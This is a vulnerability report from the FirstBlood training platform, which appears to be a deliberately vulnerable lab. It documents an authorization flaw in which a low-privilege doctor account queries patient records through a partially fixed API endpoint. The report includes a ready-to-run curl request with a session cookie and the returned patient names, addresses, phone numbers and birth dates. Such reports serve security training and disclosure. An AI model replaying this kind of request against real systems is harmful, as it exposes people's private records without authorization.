FirstBlood-#918A normal doctor still can access /drpanel/drapi/qp.php and search patients via a POST request
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-30, panya Level 7 reported:

Steps to reproduce:

  1. Register a doctor (e.g. with name test and test as an invitation code).
  2. Login as the doctor with the credentials provided at step 1.
  3. Copy drps cookie session value (d8e66390655b44c158fac363a in our case) and paste in an request like this:
    curl -X POST 'https://73ba26106566-panya.a.firstbloodhackers.com/drpanel/drapi/qp.php' -H 'Cookie: drps=d8e66390655b44c158fac363a' -d 'name=a'

Actual result:

This information about patients will be displayed:

Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Jane Hugo<br>Address: Office 310, 83, Baker St, London, W1U 6AG<br>Telephone: 020 7034 7011<br>DOB: 05/07/1989<hr>Name: Melissa White<br>Address: St. Johns Hall, Breck Rd, Poulton-Le-Fylde, FY6 7HT<br>Telephone: 07796 985353<br>DOB: 02/01/1992<hr>

Expected result:

A newly created doctor should not be allowed to use the /drpanel/drapi/qp.php endpoint and search patients information.

P3 Medium

Endpoint: /drpanel/drapi/qp.php

Parameter: name

Payload: a


FirstBlood ID: 40
Vulnerability Type: Application/Business Logic

The endpoint qp.php use to respond to GET requests and it should only allow administrators to query for patient information however the developers only fixed the bug partially and it still allowed for doctors to query for patient information. query.php is related to this file and in v1 allowed for Doctors and admins, but query.php was fixed completely whereas qp.php was not.